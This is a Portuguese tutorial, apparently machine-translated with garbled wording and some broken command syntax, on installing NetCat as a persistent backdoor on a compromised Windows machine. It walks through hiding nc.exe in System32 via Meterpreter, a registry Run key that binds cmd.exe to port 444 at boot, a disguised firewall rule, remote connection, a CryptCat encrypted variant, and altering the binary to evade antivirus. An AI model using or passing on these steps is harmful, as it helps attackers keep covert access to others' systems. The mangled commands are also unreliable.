Kali Linux NetCat Agents Persistent

Kali Linux NetCat Agents Persistent
Neste artigo, vamos percorrer coisas que você pode fazer com um utilitário de rede chamado NetCat, a faca do exército suíço das ferramentas de rede.

Introdução:

NetCat é um utilitário de rede que pode ler e gravar nas portas UDP e TCP. É frequentemente chamado de faca do exército suíço das ferramentas de hackers, porque pode fazer várias coisas como cliente e servidor durante aventuras de hackers. Frequentemente o usaremos para criar conchas de ligação e reversas em torno dos relatórios para ver o que está acontecendo e enviar arquivos entre máquinas. Shell é uma maneira de você interagir com um computador como um prompt de comando no Windows ou terminal no Linux. O NetCat nos permite realizar muitas coisas como prateleiras reversas, comunicar entre dois ou mais computadores e permitirá que você realize uma infinidade de funções. O NetCat é capaz de digitalizar e conectar -se para abrir portas usando seus argumentos de comando simples. Também é capaz de enviar arquivos e fornecer administração remota através de uma concha direta ou reversa.

Empregando o NetCat como um agente persistente:

NetCat é um programa extremamente versátil e útil. Eu mencionei anteriormente neste artigo que ele é usado para se comunicar entre dois computadores. Também pode ser usado se você quiser instalar persistência. NetCat pode ser usado como um backdoor. Então, vamos começar a criar uma concha persistente no sistema comprometido usando o NetCat. Vamos usar -NC.exe, como é o nome do executável. Mas se você renomeá -lo antes de usá -lo minimiza as chances de detecção. No entanto, mesmo depois de renomear um software antivírus, pode detectá-lo. Muitos hackers alteram alguns dos elementos do código -fonte do NetCat, que são desnecessários e, antes de usá -lo, recompite -o. Essas mudanças tornarão o NetCat invisível para o software antivírus.

Em Kali, o NetCat é armazenado nos/usr/share/windows-binários. Para carregá -lo para o sistema comprometido, use o comando de dentro do Meterpreter:

$ meterpreter> upload/usr/share/windows binários/nc.EXE C: \\ Windows \\ System32

Existem muitos arquivos nesta pasta, para ocultar um arquivo em um sistema comprometido, é o melhor lugar

Você também pode usar um protocolo de transferência de arquivo trivial se não tiver uma conexão com o Meterpreter para transferir o arquivo.

O próximo passo é configurar o registro para que você possa lançar o NetCat quando o sistema iniciar e garantir que esteja ouvindo na porta 444. Use o comando dado abaixo:

$ meterpreter> reg setval -k hklm \\ software \\ microsoft \\ windows \\
currentVersion \\ run -vv nc -d 'c: \\ windows \\ system32 \\ nc.EXE -LDP 444
-e cmd.exe'

Agora que você usou o comando mencionado acima, use o seguinte comando Queryval para garantir que a implementação bem -sucedida da mudança no registro.

$ meterpreter> reg queryval -khklm \\ software \\ microsoft \\ windows \\
CurrentVerion \\ Run -vv NC

Abra uma porta em um firewall local para confirmar que o sistema comprometido aceitará conexões remotas ao NetCat usando o comando $ netsh. Conhecer o sistema operacional do alvo tem a principal importância. O contexto da linha de comando usado para Windows Vista, Windows Server 2008, é

$ netsh Advfirewall

Para sistemas anteriores, o comando $ netsh firewall é usado. Digite o comando Shell no prompt de meterpreter para adicionar a porta ao firewall local do Windows, insira a regra usando o comando adequado. Para o funcionamento adequado do sistema, nome de usuário como 'svchostpasshrough' enquanto nomeia a regra. Um comando de amostra é mostrado o seguinte:

$ C: \ Windows \ System32> Netsh Firewall Adicionar abertura da porta
TCP 444 "Passagem de serviço"

Para confirmar a alteração, foi implementado com sucesso usando o seguinte comando:

$ C: \ Windows \ System32> Netsh Firewall Show Port Abertura

Após a confirmação da regra do porto, verifique se a opção de reinicialização funciona.

Digite o seguinte comando do prompt de meterpreter:

$ meterpreter> reinicialização

Digite o seguinte comando de um shell interativo do Windows:

$ C: \ Windows \ System32> Shutdown -R -t 00

Para acessar o sistema comprometido remotamente, digite $ NC em um prompt de comando, indique a verbosidade da conexão (-v e -vv relata informações básicas, muito mais informações, respectivamente) e digite o endereço IP do alvo e o número da porta.

$ nc -v 192.168.43.128 444

Infelizmente, o NetCat tem algumas limitações, que não há autenticação de dados transmitidos, e o software antivírus pode detectá-lo. No entanto, o problema de menos criptografia pode ser resolvido usando o CryptCat, que é uma alternativa ao netcat. Durante a transmissão entre o host explorado e o atacante, ele protege dados usando a criptografia dupla. Não será errado dizer que fornece proteção razoavelmente forte para dados criptografados.

Certifique -se de que exista um ouvinte pronto e configurado com uma senha forte para usar o CryptCat, use o seguinte comando:

$ sudo CryptCat -k Senha -l -p 444

O próximo passo é fazer upload do CryptCat para o sistema comprometido e configurá -lo para se conectar com o endereço IP do ouvinte usando o seguinte comando:

$ C: \ CryptCat -k Senha 444

É lamentável dizer que o NetCat e suas variantes podem ser detectadas pelo software antivírus. Ao usar um editor hexadecimal para alterar o código -fonte do NetCat, existe a possibilidade de o NetCat não ser detectado. Mas é um longo processo de tentativa e erro. Uma abordagem mais confiável é usar os mecanismos de persistência da estrutura de metasploit.

Conclusão:

NetCat é uma faca do exército suíço que é usada para hackers eficientes. Ele pode executar várias funções para acessar o servidor e o cliente. Este artigo fornece uma breve descrição da Sfunction e uso do NetCat. Espero que você tenha gostado se este artigo o ajudou a compartilhá -lo com seus amigos. Sinta -se à vontade para perguntar sobre qualquer dúvida que você tem sobre o NetCat. Você também pode compartilhar sua opinião e mais detalhes.